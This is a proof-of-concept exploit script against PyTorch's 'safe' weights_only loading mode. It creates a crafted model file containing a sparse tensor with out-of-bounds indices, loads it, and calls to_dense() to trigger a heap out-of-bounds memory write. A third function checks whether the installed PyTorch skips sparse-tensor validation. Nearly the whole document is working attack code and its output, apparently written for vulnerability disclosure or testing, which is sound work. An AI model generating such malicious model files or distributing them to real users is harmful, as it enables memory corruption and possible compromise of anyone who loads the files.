| | |
| | """ |
| | PoC: Sparse Tensor OOB Memory Corruption via torch.load(weights_only=True) |
| | |
| | This PoC demonstrates that a crafted .pt file containing a sparse tensor |
| | with out-of-bounds indices can be loaded with weights_only=True (the default |
| | safe mode) and cause heap memory corruption when the tensor is used. |
| | |
| | The root cause is that _validate_loaded_sparse_tensors() skips validation |
| | when check_sparse_tensor_invariants is disabled (the default since PyTorch 2.8.0). |
| | |
| | IMPACT: Heap OOB write when .to_dense() is called on the loaded sparse tensor. |
| | AFFECTED: PyTorch >= 2.8.0 with weights_only=True (default since 2.6.0) |
| | |
| | Usage: |
| | python poc_sparse_oob.py --create # Creates malicious_model.pt |
| | python poc_sparse_oob.py --load # Loads and triggers the bug |
| | python poc_sparse_oob.py --check # Checks if current PyTorch is vulnerable |
| | """ |
| |
|
| | import argparse |
| | import sys |
| | import os |
| |
|
| |
|
| | def check_vulnerability(): |
| | """Check if the current PyTorch installation is vulnerable.""" |
| | try: |
| | import torch |
| | except ImportError: |
| | print("[!] PyTorch is not installed. Install it to test.") |
| | return False |
| |
|
| | print(f"[*] PyTorch version: {torch.__version__}") |
| |
|
| | |
| | invariants_enabled = torch.sparse.check_sparse_tensor_invariants.is_enabled() |
| | print(f"[*] Sparse tensor invariant checks enabled: {invariants_enabled}") |
| |
|
| | if invariants_enabled: |
| | print("[*] NOT VULNERABLE: Sparse tensor invariant checks are enabled.") |
| | print(" This means _validate_loaded_sparse_tensors() will catch OOB indices.") |
| | return False |
| |
|
| | |
| | from torch._weights_only_unpickler import _get_allowed_globals |
| | allowed = _get_allowed_globals() |
| | rebuild_sparse_key = "torch._utils._rebuild_sparse_tensor" |
| | if rebuild_sparse_key in allowed: |
| | print(f"[*] _rebuild_sparse_tensor IS in the weights_only allowlist") |
| | else: |
| | print(f"[*] _rebuild_sparse_tensor is NOT in the weights_only allowlist") |
| | print(" NOT VULNERABLE via this vector.") |
| | return False |
| |
|
| | |
| | from torch._utils import _sparse_tensors_to_validate, _validate_loaded_sparse_tensors |
| | |
| | dummy = torch.sparse_coo_tensor( |
| | torch.tensor([[0]]), |
| | torch.tensor([1.0]), |
| | (10,), |
| | check_invariants=False |
| | ) |
| | _sparse_tensors_to_validate.append(dummy) |
| | _validate_loaded_sparse_tensors() |
| | |
| | if len(_sparse_tensors_to_validate) == 0: |
| | print("[*] _validate_loaded_sparse_tensors() SKIPPED validation (list cleared)") |
| | print("[!] VULNERABLE: Sparse tensors loaded from files are NOT validated!") |
| | return True |
| | else: |
| | print("[*] _validate_loaded_sparse_tensors() performed validation") |
| | return False |
| |
|
| |
|
| | def create_malicious_model(output_path="malicious_model.pt"): |
| | """Create a .pt file containing a sparse tensor with OOB indices.""" |
| | import torch |
| |
|
| | print(f"[*] Creating malicious model file: {output_path}") |
| |
|
| | |
| | |
| | |
| | |
| |
|
| | |
| | oob_indices = torch.tensor([[0, 7, 999999]]) |
| | values = torch.tensor([1.0, 2.0, 3.0]) |
| | size = torch.Size([10]) |
| |
|
| | |
| | with torch.sparse.check_sparse_tensor_invariants(False): |
| | malicious_sparse = torch.sparse_coo_tensor( |
| | oob_indices, values, size, check_invariants=False |
| | ) |
| |
|
| | |
| | state_dict = { |
| | "weight": torch.randn(10, 10), |
| | "bias": torch.randn(10), |
| | "sparse_layer": malicious_sparse, |
| | } |
| |
|
| | torch.save(state_dict, output_path) |
| | print(f"[+] Malicious model saved to {output_path}") |
| | print(f" File size: {os.path.getsize(output_path)} bytes") |
| | print(f"[*] The 'sparse_layer' key contains a sparse tensor with OOB indices") |
| | print(f" Declared size: {size}") |
| | print(f" Max index in indices: {oob_indices.max().item()}") |
| | return output_path |
| |
|
| |
|
| | def load_and_trigger(model_path="malicious_model.pt"): |
| | """Load the malicious model and trigger the OOB memory access.""" |
| | import torch |
| |
|
| | print(f"[*] Loading model from: {model_path}") |
| | print(f"[*] Using weights_only=True (the default safe mode)") |
| |
|
| | |
| | state_dict = torch.load(model_path, weights_only=True) |
| |
|
| | print(f"[+] Model loaded successfully with weights_only=True") |
| | print(f"[*] Keys in state_dict: {list(state_dict.keys())}") |
| |
|
| | sparse_tensor = state_dict["sparse_layer"] |
| | print(f"[*] Sparse tensor loaded:") |
| | print(f" Layout: {sparse_tensor.layout}") |
| | print(f" Size: {sparse_tensor.size()}") |
| | print(f" Indices shape: {sparse_tensor._indices().shape}") |
| | print(f" Max index: {sparse_tensor._indices().max().item()}") |
| | print(f" Invariant checks enabled: {torch.sparse.check_sparse_tensor_invariants.is_enabled()}") |
| |
|
| | print() |
| | print("[!] About to call .to_dense() -- this will trigger OOB memory write!") |
| | print("[!] The tensor has index 999999 but size is only 10") |
| | print("[!] This writes to memory offset 999999 * sizeof(float) = ~4MB past buffer end") |
| | print() |
| |
|
| | |
| | input("Press Enter to trigger the OOB write (or Ctrl+C to abort)... ") |
| |
|
| | try: |
| | dense = sparse_tensor.to_dense() |
| | print(f"[!] to_dense() completed (memory may be corrupted)") |
| | print(f" Dense shape: {dense.shape}") |
| | print(f" Dense values: {dense}") |
| | except Exception as e: |
| | print(f"[!] Exception during to_dense(): {type(e).__name__}: {e}") |
| |
|
| |
|
| | def main(): |
| | parser = argparse.ArgumentParser( |
| | description="PoC: Sparse Tensor OOB via torch.load(weights_only=True)" |
| | ) |
| | parser.add_argument("--create", action="store_true", |
| | help="Create the malicious model file") |
| | parser.add_argument("--load", action="store_true", |
| | help="Load the malicious model and trigger the bug") |
| | parser.add_argument("--check", action="store_true", |
| | help="Check if the current PyTorch is vulnerable") |
| | parser.add_argument("--output", default="malicious_model.pt", |
| | help="Output path for the malicious model file") |
| | args = parser.parse_args() |
| |
|
| | if not any([args.create, args.load, args.check]): |
| | parser.print_help() |
| | return |
| |
|
| | if args.check: |
| | vulnerable = check_vulnerability() |
| | sys.exit(0 if vulnerable else 1) |
| |
|
| | if args.create: |
| | create_malicious_model(args.output) |
| |
|
| | if args.load: |
| | load_and_trigger(args.output) |
| |
|
| |
|
| | if __name__ == "__main__": |
| | main() |
| |
|